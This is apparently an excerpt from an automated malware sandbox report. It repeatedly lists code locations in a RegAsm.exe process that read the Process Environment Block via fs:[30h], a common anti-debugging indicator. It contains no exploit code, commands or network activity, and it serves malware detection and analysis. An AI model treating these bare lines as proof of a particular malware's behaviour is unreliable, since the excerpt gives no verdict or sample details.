Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBE284 mov eax, dword ptr fs:[00000030h]	3_2_02CBE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBE284 mov eax, dword ptr fs:[00000030h]	3_2_02CBE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D00283 mov eax, dword ptr fs:[00000030h]	3_2_02D00283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D00283 mov eax, dword ptr fs:[00000030h]	3_2_02D00283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D00283 mov eax, dword ptr fs:[00000030h]	3_2_02D00283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB329E mov eax, dword ptr fs:[00000030h]	3_2_02CB329E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB329E mov eax, dword ptr fs:[00000030h]	3_2_02CB329E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D55283 mov eax, dword ptr fs:[00000030h]	3_2_02D55283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C902A0 mov eax, dword ptr fs:[00000030h]	3_2_02C902A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C902A0 mov eax, dword ptr fs:[00000030h]	3_2_02C902A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C952A0 mov eax, dword ptr fs:[00000030h]	3_2_02C952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C952A0 mov eax, dword ptr fs:[00000030h]	3_2_02C952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C952A0 mov eax, dword ptr fs:[00000030h]	3_2_02C952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C952A0 mov eax, dword ptr fs:[00000030h]	3_2_02C952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D092BC mov eax, dword ptr fs:[00000030h]	3_2_02D092BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D092BC mov eax, dword ptr fs:[00000030h]	3_2_02D092BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D092BC mov ecx, dword ptr fs:[00000030h]	3_2_02D092BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D092BC mov ecx, dword ptr fs:[00000030h]	3_2_02D092BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D172A0 mov eax, dword ptr fs:[00000030h]	3_2_02D172A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D172A0 mov eax, dword ptr fs:[00000030h]	3_2_02D172A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D162A0 mov eax, dword ptr fs:[00000030h]	3_2_02D162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D162A0 mov ecx, dword ptr fs:[00000030h]	3_2_02D162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D162A0 mov eax, dword ptr fs:[00000030h]	3_2_02D162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D162A0 mov eax, dword ptr fs:[00000030h]	3_2_02D162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D162A0 mov eax, dword ptr fs:[00000030h]	3_2_02D162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D162A0 mov eax, dword ptr fs:[00000030h]	3_2_02D162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D492A6 mov eax, dword ptr fs:[00000030h]	3_2_02D492A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D492A6 mov eax, dword ptr fs:[00000030h]	3_2_02D492A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D492A6 mov eax, dword ptr fs:[00000030h]	3_2_02D492A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D492A6 mov eax, dword ptr fs:[00000030h]	3_2_02D492A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3B256 mov eax, dword ptr fs:[00000030h]	3_2_02D3B256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3B256 mov eax, dword ptr fs:[00000030h]	3_2_02D3B256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB724D mov eax, dword ptr fs:[00000030h]	3_2_02CB724D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79240 mov eax, dword ptr fs:[00000030h]	3_2_02C79240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79240 mov eax, dword ptr fs:[00000030h]	3_2_02C79240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C86259 mov eax, dword ptr fs:[00000030h]	3_2_02C86259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7A250 mov eax, dword ptr fs:[00000030h]	3_2_02C7A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C84260 mov eax, dword ptr fs:[00000030h]	3_2_02C84260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C84260 mov eax, dword ptr fs:[00000030h]	3_2_02C84260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C84260 mov eax, dword ptr fs:[00000030h]	3_2_02C84260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7826B mov eax, dword ptr fs:[00000030h]	3_2_02C7826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC1270 mov eax, dword ptr fs:[00000030h]	3_2_02CC1270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC1270 mov eax, dword ptr fs:[00000030h]	3_2_02CC1270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA9274 mov eax, dword ptr fs:[00000030h]	3_2_02CA9274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4D26B mov eax, dword ptr fs:[00000030h]	3_2_02D4D26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4D26B mov eax, dword ptr fs:[00000030h]	3_2_02D4D26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB7208 mov eax, dword ptr fs:[00000030h]	3_2_02CB7208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB7208 mov eax, dword ptr fs:[00000030h]	3_2_02CB7208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D55227 mov eax, dword ptr fs:[00000030h]	3_2_02D55227
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7823B mov eax, dword ptr fs:[00000030h]	3_2_02C7823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3B3D0 mov ecx, dword ptr fs:[00000030h]	3_2_02D3B3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A3C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A3C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A3C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A3C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A3C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A3C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C883C0 mov eax, dword ptr fs:[00000030h]	3_2_02C883C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C883C0 mov eax, dword ptr fs:[00000030h]	3_2_02C883C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C883C0 mov eax, dword ptr fs:[00000030h]	3_2_02C883C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C883C0 mov eax, dword ptr fs:[00000030h]	3_2_02C883C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3C3CD mov eax, dword ptr fs:[00000030h]	3_2_02D3C3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D553FC mov eax, dword ptr fs:[00000030h]	3_2_02D553FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB63FF mov eax, dword ptr fs:[00000030h]	3_2_02CB63FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3F3E6 mov eax, dword ptr fs:[00000030h]	3_2_02D3F3E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E3F0 mov eax, dword ptr fs:[00000030h]	3_2_02C9E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E3F0 mov eax, dword ptr fs:[00000030h]	3_2_02C9E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E3F0 mov eax, dword ptr fs:[00000030h]	3_2_02C9E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA438F mov eax, dword ptr fs:[00000030h]	3_2_02CA438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA438F mov eax, dword ptr fs:[00000030h]	3_2_02CA438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D5539D mov eax, dword ptr fs:[00000030h]	3_2_02D5539D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7E388 mov eax, dword ptr fs:[00000030h]	3_2_02C7E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7E388 mov eax, dword ptr fs:[00000030h]	3_2_02C7E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7E388 mov eax, dword ptr fs:[00000030h]	3_2_02C7E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C78397 mov eax, dword ptr fs:[00000030h]	3_2_02C78397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C78397 mov eax, dword ptr fs:[00000030h]	3_2_02C78397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C78397 mov eax, dword ptr fs:[00000030h]	3_2_02C78397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CD739A mov eax, dword ptr fs:[00000030h]	3_2_02CD739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CD739A mov eax, dword ptr fs:[00000030h]	3_2_02CD739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB33A0 mov eax, dword ptr fs:[00000030h]	3_2_02CB33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB33A0 mov eax, dword ptr fs:[00000030h]	3_2_02CB33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA33A5 mov eax, dword ptr fs:[00000030h]	3_2_02CA33A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4A352 mov eax, dword ptr fs:[00000030h]	3_2_02D4A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7D34C mov eax, dword ptr fs:[00000030h]	3_2_02C7D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7D34C mov eax, dword ptr fs:[00000030h]	3_2_02C7D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0035C mov eax, dword ptr fs:[00000030h]	3_2_02D0035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0035C mov eax, dword ptr fs:[00000030h]	3_2_02D0035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0035C mov eax, dword ptr fs:[00000030h]	3_2_02D0035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0035C mov ecx, dword ptr fs:[00000030h]	3_2_02D0035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0035C mov eax, dword ptr fs:[00000030h]	3_2_02D0035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0035C mov eax, dword ptr fs:[00000030h]	3_2_02D0035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D55341 mov eax, dword ptr fs:[00000030h]	3_2_02D55341
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79353 mov eax, dword ptr fs:[00000030h]	3_2_02C79353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79353 mov eax, dword ptr fs:[00000030h]	3_2_02C79353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2437C mov eax, dword ptr fs:[00000030h]	3_2_02D2437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3F367 mov eax, dword ptr fs:[00000030h]	3_2_02D3F367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C87370 mov eax, dword ptr fs:[00000030h]	3_2_02C87370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C87370 mov eax, dword ptr fs:[00000030h]	3_2_02C87370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C87370 mov eax, dword ptr fs:[00000030h]	3_2_02C87370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBA30B mov eax, dword ptr fs:[00000030h]	3_2_02CBA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBA30B mov eax, dword ptr fs:[00000030h]	3_2_02CBA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBA30B mov eax, dword ptr fs:[00000030h]	3_2_02CBA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7C310 mov ecx, dword ptr fs:[00000030h]	3_2_02C7C310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA0310 mov ecx, dword ptr fs:[00000030h]	3_2_02CA0310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0930B mov eax, dword ptr fs:[00000030h]	3_2_02D0930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0930B mov eax, dword ptr fs:[00000030h]	3_2_02D0930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0930B mov eax, dword ptr fs:[00000030h]	3_2_02D0930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAF32A mov eax, dword ptr fs:[00000030h]	3_2_02CAF32A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C77330 mov eax, dword ptr fs:[00000030h]	3_2_02C77330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4132D mov eax, dword ptr fs:[00000030h]	3_2_02D4132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4132D mov eax, dword ptr fs:[00000030h]	3_2_02D4132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov ecx, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov ecx, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov ecx, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov ecx, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D550D9 mov eax, dword ptr fs:[00000030h]	3_2_02D550D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D020DE mov eax, dword ptr fs:[00000030h]	3_2_02D020DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFD0C0 mov eax, dword ptr fs:[00000030h]	3_2_02CFD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFD0C0 mov eax, dword ptr fs:[00000030h]	3_2_02CFD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA90DB mov eax, dword ptr fs:[00000030h]	3_2_02CA90DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C880E9 mov eax, dword ptr fs:[00000030h]	3_2_02C880E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7A0E3 mov ecx, dword ptr fs:[00000030h]	3_2_02C7A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA50E4 mov eax, dword ptr fs:[00000030h]	3_2_02CA50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA50E4 mov ecx, dword ptr fs:[00000030h]	3_2_02CA50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7C0F0 mov eax, dword ptr fs:[00000030h]	3_2_02C7C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC20F0 mov ecx, dword ptr fs:[00000030h]	3_2_02CC20F0
